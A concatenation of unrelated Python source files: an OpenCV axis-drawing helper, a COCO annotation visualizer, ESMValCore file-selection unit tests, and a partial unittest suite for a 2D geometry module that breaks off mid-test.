image_raw (numpy.ndarray): The image on which to draw the axes corners (numpy.ndarray): An array of 2D points on the image in which the first point is the origin of the axes to draw image_points (np.array): 2D points on the image at the end of the three axes label (str): A string label to place near the coordinate frame Returns: numpy.ndarray Image with the axes drawn on it. """ corners = np.rint(corners).astype('int') image_points = np.rint(image_points).astype('int') corner = tuple(corners[0].ravel()) image = image_raw.copy() temp = cv2.arrowedLine(image, corner, tuple(image_points[0].ravel()), (255, 0, 0), 5) if temp is not None: image = temp letters = np.array(image_points) letter_space = 30 for row in range(letters.shape[0]): if letters[row][0][0] < corner[0]: letters[row][0][0] -= letter_space if letters[row][0][1] < corner[1]: letters[row][0][1] -= letter_space else: letters[row][0][1] += 1.5*letter_space temp = cv2.putText(image, "x", tuple(letters[0].ravel()), cv2.FONT_HERSHEY_SIMPLEX, 2, (255, 0, 0), 4) if temp is not None: image = temp temp = cv2.arrowedLine(image, corner, tuple(image_points[1].ravel()), (0, 255, 0), 5) if temp is not None: image = temp temp = cv2.putText(image, "y", tuple(letters[1].ravel()), cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 255, 0), 4) if temp is not None: image = temp temp = cv2.arrowedLine(image, corner, tuple(image_points[2].ravel()), (0, 0, 255), 5) if temp is not None: image = temp temp = cv2.putText(image, "z", tuple(letters[2].ravel()), cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 0, 255), 4) if temp is not None: image = temp # put below the axes in the middle: temp = cv2.putText(image, label, corner, cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2) if temp is not None: image = temp return image
from emd_with_classes.utils import Iterator from matplotlib import pyplot as plt import cv2 import numpy as np from matplotlib.patches import Polygon from .dataset import Dataset class Visualizer: def __init__(self, dataset_coco: Dataset): self.dataset = dataset_coco def visualize_annotations(self, categories=None): def show_image(image_path, index): im_id = images[index]["id"] print("Image with id:{}".format(im_id)) plt.figure(figsize=(10, 10)) img = cv2.cvtColor(cv2.imread(image_path), cv2.COLOR_BGR2RGB) plt.imshow(img) annIds = self.dataset.coco_lib.getAnnIds(imgIds=[im_id]) anns = self.dataset.coco_lib.loadAnns(annIds) anns = [ann for ann in self.dataset.coco_lib.loadAnns(annIds) if ann["category_id"] in category_ids] if len(anns) == 0: plt.show() return 0 if self.dataset.is_segmentation and 'segmentation' in anns[0]: ax = plt.gca() for ann in anns: cat = self.dataset.get_category_name_from_id(ann['category_id']) color = colors[cat] seg_points = ann["segmentation"] for pol in seg_points: poly = [[float(pol[i]), float(pol[i+1])] for i in range(0, len(pol), 2)] np_poly = np.array(poly) ax.add_patch( Polygon(np_poly, linestyle='--', fill=False, facecolor='none', edgecolor=color, linewidth=2)) ax.text(x=seg_points[0][0], y=seg_points[0][1], s=ann['category_id'], color='white', fontsize=9, horizontalalignment='left',verticalalignment='top',bbox=dict(facecolor=color)) plt.imshow(img) plt.axis('off') plt.show() else: ax = plt.gca() for ann in anns: cat = self.dataset.get_category_name_from_id(ann['category_id']) color = colors[cat] [bbox_x, bbox_y, bbox_w, bbox_h] = ann['bbox'] poly = [[bbox_x, bbox_y], [bbox_x, bbox_y + bbox_h], [bbox_x + bbox_w, bbox_y + bbox_h], [bbox_x + bbox_w, bbox_y]] np_poly = np.array(poly).reshape((4, 2)) c = (np.random.random((1, 3)) * 0.6 + 0.4).tolist()[0] ax.add_patch(Polygon(np_poly, linestyle='--', facecolor='none', edgecolor=color, linewidth=3)) plt.show() if categories is None: categories = self.dataset.get_categories_names() images = self.dataset.get_images_id_with_path() else: images = [] for cat in categories: ii = self.dataset.get_images_id_with_path_for_category(cat) images.extend(ii) paths = [] for img in images: if not img["path"] in paths: paths.append(img["path"]) colors = {} category_ids = [] for c in categories: colors[c] = (np.random.random((1, 3)) * 0.6 + 0.4).tolist()[0] category_ids.append(self.dataset.get_category_id_from_name(c)) iterator = Iterator(paths, show_name=False, image_display_function=show_image) iterator.start_iteration() def visualize_annotations_for_property(self, meta_annotation, meta_annotation_value): def show_image(image_path, index): im_id = images[index]["id"] print("Image with id:{}".format(im_id)) plt.figure(figsize=(10, 10)) img = cv2.cvtColor(cv2.imread(image_path), cv2.COLOR_BGR2RGB) plt.imshow(img) annIds = self.dataset.coco_lib.getAnnIds(imgIds=[im_id]) anns = self.dataset.coco_lib.loadAnns(annIds) anns = [ann for ann in self.dataset.coco_lib.loadAnns(annIds) if ann[meta_annotation] == meta_annotation_value] if len(anns) == 0: plt.show() return 0 if self.dataset.is_segmentation and 'segmentation' in anns[0]: ax = plt.gca() for ann in anns: cat = self.dataset.get_category_name_from_id(ann['category_id']) color = colors[cat] seg_points = ann["segmentation"] for pol in seg_points: poly = [[float(pol[i]), float(pol[i+1])] for i in range(0, len(pol), 2)] np_poly = np.array(poly) ax.add_patch( Polygon(np_poly, linestyle='--', fill=False, facecolor='none', edgecolor=color, linewidth=2)) ax.text(x=seg_points[0][0], y=seg_points[0][1], s=ann['category_id'], color='white', fontsize=9, horizontalalignment='left',verticalalignment='top',bbox=dict(facecolor=color)) plt.imshow(img) plt.axis('off') plt.show() else: ax = plt.gca() for ann in anns: cat = self.dataset.get_category_name_from_id(ann['category_id']) color = colors[cat] [bbox_x, bbox_y, bbox_w, bbox_h] = ann['bbox'] poly = [[bbox_x, bbox_y], [bbox_x, bbox_y + bbox_h], [bbox_x + bbox_w, bbox_y + bbox_h], [bbox_x + bbox_w, bbox_y]] np_poly = np.array(poly).reshape((4, 2)) c = (np.random.random((1, 3)) * 0.6 + 0.4).tolist()[0] ax.add_patch(Polygon(np_poly, linestyle='--', facecolor='none', edgecolor=color, linewidth=3)) plt.show() images = self.dataset.get_images_id_with_path_with_property_value(meta_annotation, meta_annotation_value) colors = {} category_ids = [] categories = self.dataset.get_categories_names() for c in categories: colors[c] = (np.random.random((1, 3)) * 0.6 + 0.4).tolist()[0] category_ids.append(self.dataset.get_category_id_from_name(c)) paths = [img["path"] for img in images] iterator = Iterator(paths, show_name=False, image_display_function=show_image) iterator.start_iteration() def visualize_annotations_for_class_for_property(self, category, meta_annotation, meta_annotation_value): def show_image(image_path, index): im_id = images[index]["id"] print("Image with id:{}".format(im_id)) plt.figure(figsize=(10, 10)) img = cv2.cvtColor(cv2.imread(image_path), cv2.COLOR_BGR2RGB) plt.imshow(img) category_id = self.dataset.get_category_id_from_name(category) annIds = self.dataset.coco_lib.getAnnIds(imgIds=[im_id], catIds=[category_id]) anns = [ann for ann in self.dataset.coco_lib.loadAnns(annIds) if ann[meta_annotation] == meta_annotation_value] if len(anns) == 0: plt.show() return 0 if self.dataset.is_segmentation and 'segmentation' in anns[0]: ax = plt.gca() for ann in anns: seg_points = ann["segmentation"] for pol in seg_points: poly = [[float(pol[i]), float(pol[i+1])] for i in range(0, len(pol), 2)] np_poly = np.array(poly) ax.add_patch( Polygon(np_poly, linestyle='--', fill=False, facecolor='none', edgecolor=color, linewidth=2)) ax.text(x=seg_points[0][0], y=seg_points[0][1], s=ann['category_id'], color='white', fontsize=9, horizontalalignment='left',verticalalignment='top',bbox=dict(facecolor=color)) plt.imshow(img) plt.axis('off') plt.show() else: ax = plt.gca() for ann in anns: bbox_x, bbox_y, bbox_w, bbox_h = ann['bbox'] poly = [[bbox_x, bbox_y], [bbox_x, bbox_y + bbox_h], [bbox_x + bbox_w, bbox_y + bbox_h], [bbox_x + bbox_w, bbox_y]] np_poly = np.array(poly).reshape((4, 2)) ax.add_patch(Polygon(np_poly, linestyle='--', facecolor='none', edgecolor=color, linewidth=3)) ax.text(x=bbox_x, y=bbox_y, s=ann['category_id'], color='white', fontsize=9, horizontalalignment='left',verticalalignment='top',bbox=dict(facecolor=color)) plt.axis('off') plt.show() images = self.dataset.get_images_id_with_path_for_category_with_property_value(category, meta_annotation, meta_annotation_value) color = (np.random.random((1, 3)) * 0.6 + 0.4).tolist()[0] paths = [img["path"] for img in images] iterator = Iterator(paths, show_name=False, image_display_function=show_image) iterator.start_iteration()
<reponame>jvegreg/ESMValCore from esmvalcore._data_finder import select_files def test_select_files(): files = [ "pr_Amon_MPI-ESM1-2-HR_historical_r1i1p1f1_gn_195501-195912.nc", "pr_Amon_MPI-ESM1-2-HR_historical_r1i1p1f1_gn_196001-196412.nc", "pr_Amon_MPI-ESM1-2-HR_historical_r1i1p1f1_gn_196501-196912.nc", "pr_Amon_MPI-ESM1-2-HR_historical_r1i1p1f1_gn_197001-197412.nc", ] result = select_files(files, '1962/1967') expected = [ "pr_Amon_MPI-ESM1-2-HR_historical_r1i1p1f1_gn_196001-196412.nc", "pr_Amon_MPI-ESM1-2-HR_historical_r1i1p1f1_gn_196501-196912.nc", ] assert result == expected def test_select_files_monthly_resolution(): """Test file selection works for monthly data.""" files = [ "pr_Amon_EC-Earth3_dcppA-hindcast_s1960-r1i1p1f1_gr_196011-196110.nc", "pr_Amon_EC-Earth3_dcppA-hindcast_s1960-r1i1p1f1_gr_196111-196210.nc", "pr_Amon_EC-Earth3_dcppA-hindcast_s1960-r1i1p1f1_gr_196211-196310.nc", "pr_Amon_EC-Earth3_dcppA-hindcast_s1960-r1i1p1f1_gr_196311-196410.nc", ] result = select_files(files, '196201/196205') expected = [ "pr_Amon_EC-Earth3_dcppA-hindcast_s1960-r1i1p1f1_gr_196111-196210.nc" ] assert result == expected def test_select_files_daily_resolution(): """Test file selection works for daily data.""" filename = "tas_day_EC-Earth3_dcppA-hindcast_s1960-r1i1p1f1_gr_" files = [ filename + "19601101-19611031.nc", filename + "19611101-19621031.nc", filename + "19621101-19631031.nc" ] result = select_files(files, '19600101/19611215') expected = [ filename + "19601101-19611031.nc", filename + "19611101-19621031.nc", ] assert result == expected def test_select_files_sub_daily_resolution(): """Test file selection works for sub-daily data.""" filename = "psl_6hrPlev_EC-Earth3_dcppA-hindcast_s1960-r1i1p1f1_gr_" files_no_separator = [ filename + "196011010900-196110312100.nc", filename + "196111010900-196210312100.nc", filename + "196211010300-196310312100.nc", ] files_separator = [ filename + "19601101T0900-19611031T2100.nc", filename + "19611101T0900-19621031T2100.nc", filename + "19621101T0300-19631031T2100.nc", ] result_no_separator = select_files( files_no_separator, '19600101T0900/19610101T09HH00MM') result_separator = select_files( files_separator, '19600101T0900/19610101T0900') expected_no_separator = [ filename + "196011010900-196110312100.nc", ] expected_separator = [ filename + "19601101T0900-19611031T2100.nc", ] assert result_no_separator == expected_no_separator assert result_separator == expected_separator def test_select_files_time_period(): """Test file selection works with time range given as duration periods of various resolution.""" filename_date = "pr_Amon_EC-Earth3_dcppA-hindcast_s1960-r1i1p1f1_gr_" filename_datetime = ( "psl_6hrPlev_EC-Earth3_dcppA-hindcast_s1960-r1i1p1f1_gr_") files_date = [ filename_date + "196011-196110.nc", filename_date + "196111-196210.nc", filename_date + "196211-196310.nc", filename_date + "196311-196410.nc", filename_date + "196411-196510.nc", ] files_datetime = [ filename_datetime + "196011010900-196110312100.nc", filename_datetime + "196111010900-196210312100.nc", filename_datetime + "196211010300-196310312100.nc", ] result_date = select_files(files_date, '196211/P2Y5M') result_datetime = select_files(files_datetime, '19601101T1300/P1Y0M0DT6H') expected_date = [ filename_date + "196211-196310.nc", filename_date + "196311-196410.nc", filename_date + "196411-196510.nc", ] expected_datetime = [ filename_datetime + "196011010900-196110312100.nc", filename_datetime + "196111010900-196210312100.nc", ] assert result_date == expected_date assert result_datetime == expected_datetime def test_select_files_varying_format(): """Test file selection works with time range of various time resolutions and formats.""" filename = "psl_6hrPlev_EC-Earth3_dcppA-hindcast_s1960-r1i1p1f1_gr_" files = [ filename + "196011010900-196110312100.nc", filename + "196111010900-196210312100.nc", filename + "196211010300-196310312100.nc", ] result_yearly = select_files(files, '1960/1962') result_monthly = select_files(files, '196011/196210') result_daily = select_files(files, '19601101/19601105') assert result_yearly == files assert result_monthly == files[0:2] assert result_daily == [files[0]]
<filename>test.py import unittest import geom from geom import P, L, B, Pg, Co, ML, MPg class TestPoint(unittest.TestCase): def test_point_eq(self): self.assertEqual(P((1, 1)), P((1.0, 1.0))) self.assertNotEqual(P((1, 1)), P((1.0001, 1.0))) class TestLine(unittest.TestCase): def assertPointEqual(self, a, b): self.assertAlmostEqual(a[0], b[0]) self.assertAlmostEqual(a[1], b[1]) def test_constructor(self): with self.assertRaises(ValueError): L((3, 5), (3.0, 5.0)) def test_in_bound(self): with self.assertRaises(ValueError): geom.in_bound((2, 1), (2, 1), (1, 1)) # Horizontal line = L((1, 2), (5, 2)) self.assertIsNone(line.in_bound(P(3, 2))) self.assertFalse(line.in_bound(P(3, 3))) self.assertTrue(line.in_bound(P(3, 1))) # Vertical line = L((-1, 2), (-1, 5)) self.assertIsNone(line.in_bound(P(-1, 4))) self.assertTrue(line.in_bound(P(3, 3))) self.assertFalse(line.in_bound(P(-5, 7))) # Non-orthogonal line = L((1, 2), (4, 1)) self.assertFalse(line.in_bound(P(3, 2))) self.assertTrue(line.in_bound(P(-1, 2))) self.assertIsNone(line.in_bound(P(3, 4/3))) line = L((-1, 2), (-4, 1)) self.assertTrue(line.in_bound(P(-3, 2))) self.assertFalse(line.in_bound(P(0, 2))) def test_intersects_h(self): self.assertTrue(L((0, 0), (2, 2)).intersects_y(1)) self.assertTrue(L((2, 2), (0, 0)).intersects_y(1)) self.assertFalse(L((-1, -1), (5, -1)).intersects_y(-1)) self.assertFalse(L((2, 2), (0, 2)).intersects_y(1)) self.assertFalse(L((0, 0), (-1, -1)).intersects_y(1)) def test_get_intercept_h(self): self.assertEqual(L((1, 1), (3, 3)).get_y_intercept(2), 2) self.assertEqual(L((3, 4), (5, 1)).get_y_intercept(2), 13/3) def test_extrapolate_intersection(self): # Vertical/horizontal a = L((3, 3), (3, 4)) b = L((9, 9), (7, 9)) expect = (3, 9) self.assertPointEqual(a.extrapolate_intersection(b), expect) self.assertPointEqual(b.extrapolate_intersection(a), expect) # Both vertical b = L((7, 7), (7, 5)) self.assertIsNone(a.extrapolate_intersection(b)) self.assertIsNone(b.extrapolate_intersection(a)) # Vertical/non-orthogonal b = L((1, 2), (5, 3)) expect = (3, 2.5) self.assertPointEqual(a.extrapolate_intersection(b), expect) self.assertPointEqual(b.extrapolate_intersection(a), expect) b = -b self.assertPointEqual(a.extrapolate_intersection(b), expect) self.assertPointEqual(b.extrapolate_intersection(a), expect) b = L((4, 5), (5, 2)) expect = (3, 8) self.assertPointEqual(a.extrapolate_intersection(b), expect) self.assertPointEqual(b.extrapolate_intersection(a), expect) b = -b self.assertPointEqual(a.extrapolate_intersection(b), expect) self.assertPointEqual(b.extrapolate_intersection(a), expect) # Both horizontal a = L((1, 2), (4, 2)) b = L((5, 6), (6, 6)) self.assertIsNone(a.extrapolate_intersection(b)) self.assertIsNone(b.extrapolate_intersection(a)) # Horizontal/vertical b = L((9, 3), (9, -1)) expect = (9, 2) self.assertPointEqual(a.extrapolate_intersection(b), expect) self.assertPointEqual(b.extrapolate_intersection(a), expect) # Horizontal/non-orthogonal b = L((9, 3), (10, 5)) expect = (8.5, 2) self.assertPointEqual(a.extrapolate_intersection(b), expect) self.assertPointEqual(b.extrapolate_intersection(a), expect) # Both non-orthogonal a = L((0, 1), (4, 2)) b = L((2, 4), (4, 3)) expect = (5 + 1/3, 2 + 1/3) self.assertPointEqual(a.extrapolate_intersection(b), expect) self.assertPointEqual(b.extrapolate_intersection(a), expect) b = -b self.assertPointEqual(a.extrapolate_intersection(b), expect) self.assertPointEqual(b.extrapolate_intersection(a), expect) a = -a self.assertPointEqual(a.extrapolate_intersection(b), expect) self.assertPointEqual(b.extrapolate_intersection(a), expect) b = -b self.assertPointEqual(a.extrapolate_intersection(b), expect) self.assertPointEqual(b.extrapolate_intersection(a), expect) def test_intersects_point(self): # Vertical line = L((3, 3), (3, 4)) self.assertTrue(line.intersects_point(P(3, 3.5))) self.assertFalse(line.intersects_point(P(4, 3))) # Horizontal line = L((-2, -2), (2, -2)) self.assertTrue(line.intersects_point(P(0, -2))) self.assertFalse(line.intersects_point(P(0, -1.999))) # Other line = L((0, 0), (2, 2)) self.assertTrue(line.intersects_point(P(1, 1))) self.assertFalse(line.intersects_point(P(3, 3))) def test_intersects_line(self): # Vertical a = L((3, 3), (3, 5)) self.assertFalse(a.intersects_line(L((4, 3), (4, 5)))) self.assertFalse(a.intersects_line(L((0, 2), (4, 2)))) self.assertTrue(a.intersects_line(L((3, 3), (4, 4)))) self.assertTrue(a.intersects_line(L((0, 1), (5, 6)))) self.assertTrue(a.intersects_line(L((3, 4), (3, 6)))) # Horizontal a = L((3, 3), (-1, 3)) self.assertFalse(a.intersects_line(L((-1, 2), (5, 2)))) self.assertFalse(a.intersects_line(L((0, 2), (0, 0)))) self.assertTrue(a.intersects_line(L((3, 3), (4, 4)))) self.assertTrue(a.intersects_line(L((0, 0), (1, 5)))) self.assertTrue(a.intersects_line(L((0, 3), (1, 3)))) # Other a = L((0, 3), (4, 0)) self.assertFalse(a.intersects_line(L((0, 0), (4, -3)))) self.assertFalse(a.intersects_line(L((-1, 0), (0, 5)))) self.assertTrue(a.intersects_line(L((0, 0), (5, 5)))) self.assertTrue(a.intersects_line(L((4, 0), (-2, 1)))) self.assertTrue(a.intersects_line(L((2, 1.5), (-2, 4.5)))) def test_intersection_line(self): # Vertical a = L((3, 3), (3, 5)) self.assertIsNone(a.intersection_line(L((4, 3), (4, 5)))) self.assertIsNone(a.intersection_line(L((0, 2), (4, 2)))) self.assertEqual( a.intersection_line(L((3, 3), (4, 4))), P(3, 3)) self.assertEqual( a.intersection_line(L((0, 1), (5, 6))), P(3, 4)) self.assertEqual( a.intersection_line(L((3, 4), (3, 6))), L((3, 4), (3, 5))) # Horizontal a = L((3, 3), (-1, 3)) self.assertIsNone(a.intersection_line(L((-1, 2), (5, 2)))) self.assertIsNone(a.intersection_line(L((0, 2), (0, 0)))) self.assertEqual( a.intersection_line(L((3, 3), (4, 4))), P(3, 3)) self.assertEqual( a.intersection_line(L((0, 0), (1, 5))), P(3/5, 3)) self.assertEqual( a.intersection_line(L((0, 3), (1, 3))), L((1, 3), (0, 3))) # Other a = L((0, 3), (4, 0)) self.assertIsNone(a.intersection_line(L((0, 0), (4, -3)))) self.assertIsNone(a.intersection_line(L((-1, 0), (0, 5)))) self.assertEqual( a.intersection_line(L((4, 0), (0, 3))), L((0, 3), (4, 0))) self.assertTrue(a.intersection_line(L((0, 0), (5, 5))).nearly_equal( P(12/7, 12/7))) self.assertEqual( a.intersection_line(L((4, 0), (-2, 1))), P(4, 0)) self.assertEqual( a.intersection_line(L((2, 1.5), (-2, 4.5))), L((0, 3), (2, 1.5))) def test_crop_line(self): a = L((0, 0), (4, 4)) f = a.crop_line b = L((0, -1), (1, -1)) self.assertIsNone(f(b)) b = -b self.assertEqual(f(b), a) b = L((1, -1), (-1, 1)) self.assertEqual(f(b), a) b = -b self.assertEqual(f(b), P(0, 0)) b = L((0, 2), (1, 2)) self.assertEqual(f(b), L((0, 0), (2, 2))) b = -b self.assertEqual(f(b), L((2, 2), (4, 4))) class TestBoundingBox(unittest.TestCase): def test_contains(self): bbox = B(-2, -7/3, 3.1, 6) f = bbox.contains self.assertTrue(f(P(0, 0))) self.assertFalse(f(P(0, 6))) self.assertFalse(f(P(12, -8))) self.assertTrue(f(L((0, 0), (1, 1)))) self.assertFalse(f(L((0, 0), (7, 7)))) self.assertFalse(f(L((-3, 0), (-4, 1)))) # Lines on the boundary are not contained self.assertFalse(f(L((3.1000000001, 0), (3.1000000001, -1)))) self.assertTrue(f(B(0, 0, 1, 1))) self.assertFalse(f(B(0, 0, 1000, 1000))) self.assertFalse(f(B(-7, -7, -6, -6))) # A shape contains itself self.assertTrue(f(bbox)) poly = Pg([(-1, -1), (0, 3), (3, 0), (-1, -1)]) self.assertTrue(f(poly)) poly = Pg([(6, 6), (7, 10), (10, 7), (6, 6)]) self.assertFalse(f(poly)) def test_intersects(self): bbox = B(0, 0, 10, 5) f = bbox.intersects # Points self.assertFalse(f(P(11, 0))) self.assertFalse(f(P(-1, 0))) self.assertFalse(f(P(1, -1))) self.assertFalse(f(P(1, 6))) self.assertTrue(f(P(3, 3))) self.assertTrue(f(P(0, 0))) self.assertTrue(f(P(0, 1))) self.assertTrue(f(P(0, 5))) self.assertTrue(f(P(5, 5))) self.assertTrue(f(P(10, 5))) self.assertTrue(f(P(10, 2))) self.assertTrue(f(P(10, 0))) self.assertTrue(f(P(9, 0))) # Lines: # - External self.assertFalse(f(L((11, 0), (11, 5)))) # - Internal self.assertTrue(f(L((1, 1), (4, 3)))) # - Overlapping self.assertTrue(f(L((-7, 4), (12, 4)))) # - Boundary self.assertTrue(f(L((0, 0), (0, 5)))) self.assertTrue(f(L((10, 4), (10, 6)))) # - Corner self.assertTrue(f(L((9, -1), (11, 1)))) # Polygons: poly = Pg([(0, 6), (0, 9), (4, 6), (0, 6)]) # - External self.assertFalse(f(poly)) # - Internal poly = poly.move(1, -5) self.assertTrue(f(poly)) # - Overlapping poly = poly.move(8, 0) self.assertTrue(f(poly)) # - Shared boundary line poly = poly.move(1, 0) self.assertTrue(f(poly)) # - Shared boundary point poly = poly.move(-14, 0) self.assertTrue(f(poly)) poly = poly.move(0, 4) self.assertTrue(f(poly)) def test_intersection_point(self): bbox = B(0, 0, 10, 5) f = bbox.intersection self.assertIsNone(f(P(-1, 0))) p = P(0, 0) self.assertEqual(f(p), p) p = P(3, 3) self.assertEqual(f(p), p) p = P(10, 5) self.assertEqual(f(p), p) def test_intersection_line(self): bbox = B(0, 0, 10, 5) f = bbox.intersection # Fully external self.assertIsNone(f(L((11, 1), (12, 6)))) # Fully internal line = L((1, 1), (9, 4)) self.assertEqual(f(line), line) # Partly internal self.assertEqual(f(L((-1, 3), (1, 3))), L((0, 3), (1, 3))) self.assertEqual(f(L((5, 0), (11, 12))), L((5, 0), (7.5, 5))) # Shared boundary self.assertEqual(f(L((10, 5), (10, 0))), L((10, 5), (10, 0))) self.assertEqual(f(L((1, 5), (9, 5))), L((1, 5), (9, 5))) self.assertEqual(f(L((0, 2), (0, -2))), L((0, 2), (0, 0))) # Point contact self.assertEqual(f(L((15, 0), (5, 10))), P(10, 5)) self.assertEqual(f(L((3, 5), (4, 8))), P(3, 5)) def test_intersection_bbox(self): a = B(0, 0, 10, 5) f = a.intersection b = B(-5, -1, -1, 4) self.assertIsNone(f(b)) b = B(2, 3, 8, 4) self.assertEqual(f(b), b) b = B(-10, -2, 15, 10) self.assertEqual(f(b), a) b = a self.assertEqual(f(b), a) b = B(8, -2, 12, 2) self.assertEqual(f(b), B(8, 0, 10, 2)) def test_intersection_polygon(self): bbox = B(0, 0, 10, 5) f = bbox.intersection # No intersection poly = Pg([(12, 1), (13, 4), (17, 2), (12, 1)]) self.assertIsNone(f(poly)) # Fully internal poly = Pg([(1, 1), (3, 4), (7, 2), (1, 1)]) self.assertEqual(f(poly), poly) # Fully containing poly = Pg([(-1, -1), (-2, 9), (13, 11), (14, -6), (-1, -1)]) self.assertEqual(f(poly), bbox) # Partly internal poly = Pg([(8, 0), (12, 4), (12, 0), (8, 0)]) self.assertEqual(f(poly), Pg([(8, 0), (10, 2), (10, 0), (8, 0)])) # Internal, shared boundary poly = Pg([(0, 0), (4, 5), (4, 0), (0, 0)]) self.assertEqual(f(poly), poly) # External, shared boundary poly = Pg([(0, 0), (-4, 0), (0, 5), (0, 0)]) self.assertTrue(f(poly).coterminous(L((0, 0), (0, 5)))) # Point contact poly = Pg([(3, 9), (7, 9), (5, 5), (3, 9)]) self.assertEqual(f(poly), P(5, 5)) class TestPolygon(unittest.TestCase): def test_constructor(self): # not enough distinct points with self.assertRaises(ValueError): poly = Pg([(1, 2), (1, 2), (3, 5), (1, 2)]) # backtracking with self.assertRaises(ValueError): poly = Pg([(1, 2), (3, 6), (2, 4)]) # self-intersection with self.assertRaises(ValueError): poly = Pg([(1, 2), (3, 6), (5, 4), (-1, 4), (1, 2)]) # simple triangle poly = Pg([(1, 2), (3, 5), (4, 1), (1, 2)]) self.assertEqual(len(poly), 4) def test_eq(self): a = Pg([(1, 2), (3, 5), (4, 1), (1, 2)]) b = Pg([(1, 2), (3, 5), (4, 1), (1, 2)]) self.assertEqual(a, b) b = Pg([(1, 2), (3.1, 5), (4, 1), (1, 2)]) self.assertNotEqual(a, b) b = Pg([ (1, 1), (1, 6), (2, 5), (2, 2), (4, 2), (3, 4), (5, 4), (4, 0), (1, 1), ]) self.assertNotEqual(a, b) # Same ring of points, but starting from a different one. b = Pg([(4, 1), (1, 2), (3, 5), (4, 1)]) self.assertEqual(a, b) def test_is_convex(self): # simple triangle poly = Pg([(1, 2), (3, 5), (4, 1), (1, 2)]) self.assertTrue(poly.is_convex) # octagon centred on (0, 0) poly = Pg([ (1, 2), (2, 1), (2, -1), (1, -2), (-1, -2), (-2, -1), (-2, 1), (-1, 2), (1, 2), ]) self.assertTrue(poly.is_convex) # definitely non-convex poly = Pg([ (1, 1), (1, 6), (2, 5), (2, 2), (4, 2), (3, 4), (5, 4), (4, 0), (1, 1), ]) self.assertFalse(poly.is_convex) def test_divide_polygon(self): poly = [ (1, 1), (1, 6), (2, 5), (2, 2), (4, 2), (3, 4), (5, 4), (4, 0), (1, 1), ] with self.assertRaises(ValueError): geom.divide_polygon(poly, 0, 0) with self.assertRaises(ValueError): geom.divide_polygon(poly, 0, 1) with self.assertRaises(ValueError): geom.divide_polygon(poly, 4, 3) with self.assertRaises(ValueError): geom.divide_polygon(poly, -1, 3) with self.assertRaises(ValueError): geom.divide_polygon(poly, 4, 9) with self.assertRaises(ValueError): geom.divide_polygon(poly, 7, 0) self.assertEqual( geom.divide_polygon(poly, 0, 3), ( [(1, 1), (1, 6), (2, 5), (2, 2), (1, 1)], [(1, 1), (2, 2), (4, 2), (3, 4), (5, 4), (4, 0), (1, 1)], )) self.assertEqual( geom.divide_polygon(poly, 4, 8), ( [(4, 2), (3, 4), (5, 4), (4, 0), (1, 1), (4, 2)], [(1, 1), (1, 6), (2, 5), (2, 2), (4, 2), (1, 1)], )) self.assertEqual( geom.divide_polygon(poly, 4, 7), ( [(4, 2), (3, 4), (5, 4), (4, 0), (4, 2)], [(1, 1), (1, 6), (2, 5), (2, 2), (4, 2), (4, 0), (1, 1)], )) def test_shift_polygon(self): # simple triangle poly = [(1, 2), (3, 5), (4, 1), (1, 2)] self.assertEqual(geom.shift_polygon(poly, 0), poly) shift1 = [(3, 5), (4, 1), (1, 2), (3, 5)] shift2 = [(4, 1), (1, 2), (3, 5), (4, 1)] self.assertEqual(geom.shift_polygon(poly, 1), shift1) self.assertEqual(geom.shift_polygon(poly, 2), shift2) self.assertEqual(geom.shift_polygon(poly, 3), poly) self.assertEqual(geom.shift_polygon(poly, 4), shift1) def test_contains_point(self): # simple triangle poly = Pg([(1, 2), (3, 5), (4, 1), (1, 2)]) f = poly.contains_point expect = ( (False, False, False, False, False), (False, False, False, False, False), (False, False, True, True, False), (False, False, True, True, False), (False, False, False, True, False), (False, False, False, False, False), ) for y in range(len(expect)): for x in range(len(expect[y])): self.assertIs(f(P(x, y)), expect[y][x], f"({x}, {y})") # octagon centred on (0, 0) poly = Pg([ (1, 2), (2, 1), (2, -1), (1, -2), (-1, -2), (-2, -1), (-2, 1), (-1, 2), (1, 2), ]) f = poly.contains_point self.assertTrue(f(P(1, 1))) self.assertTrue(f(P(1, -1))) self.assertTrue(f(P(-1, -1))) self.assertTrue(f(P(-1, 1))) self.assertFalse(f(P(2, 2))) # horseshoe poly = Pg([ (1, 1), (1, 6), (2, 5), (2, 2), (4, 2), (3, 4), (5, 4), (4, 0), (1, 1), ]) f = poly.contains_point expect = ( (False, False, False, False, False, False, False), (False, False, True, True, True, False, False), (False, False, False, False, False, False, False), (False, False, False, False, True, False, False), (False, False, False, False, False, False, False), (False, False, False, False, False, False, False), (False, False, False, False, False, False, False), ) for y in range(len(expect)): for x in range(len(expect[y])): self.assertIs(f(P(x, y)), expect[y][x], f"({x}, {y})") def test_contains_line(self): # simple triangle poly = Pg([(1, 2), (3, 5), (4, 1), (1, 2)]) f = poly.contains_line # Fully external self.assertFalse(f(L((10, 0), (10, 2)))) self.assertFalse(f(L((2, 0), (0, 3)))) # Partly external self.assertFalse(f(L((3, 3), (5, 3)))) # Fully internal self.assertTrue(f(L((3, 2), (2, 3)))) # Spanning self.assertTrue(f(L((1, 2), (3.5, 3)))) # On boundary self.assertFalse(f(L((3.5, 3), (3.75, 2)))) self.assertFalse(f(L((3.5, 3), (4.5, -1)))) # horseshoe poly = Pg([ (1, 1), (1, 6), (2, 5), (2, 2), (4, 2), (3, 4), (5, 4), (4, 0), (1, 1), ]) f = poly.contains_line # Fully external self.assertFalse(f(L((10, 0), (10, 2)))) self.assertFalse(f(L((3, 0), (0, 0)))) # Partly external self.assertFalse(f(L((4, 3), (6, 3)))) # Fully internal self.assertTrue(f(L((3, 1), (2, 1)))) # Spanning self.assertTrue(f(L((1, 4), (2, 4)))) # From boundary to internal self.assertTrue(f(L((1, 2), (3, 1)))) # On boundary self.assertFalse(f(L((1, 2), (1, 5)))) self.assertFalse(f(L((4, 4), (6, 4)))) def test_contains_bbox(self): # simple triangle poly = Pg([(1, 2), (3, 5), (4, 1), (1, 2)]) f = poly.contains_bbox # Fully internal self.assertTrue(f(B(2, 2, 3, 3))) # Fully external self.assertFalse(f(B(20, 20, 30, 30))) # Partly external self.assertFalse(f(B(1, 1, 3, 3))) # Point contact with boundary self.assertTrue(f(B(2, 2, 3.5, 3))) # octagon centred on (0, 0) poly = Pg([ (1, 2), (2, 1), (2, -1), (1, -2), (-1, -2), (-2, -1), (-2, 1), (-1, 2), (1, 2), ]) f = poly.contains_bbox # Sharing entire boundary lines self.assertTrue(f(B(-2, -1, 2, 1))) self.assertFalse(f(B(-1, 2, 1, 4))) # horseshoe poly = Pg([ (1, 1), (1, 6), (2, 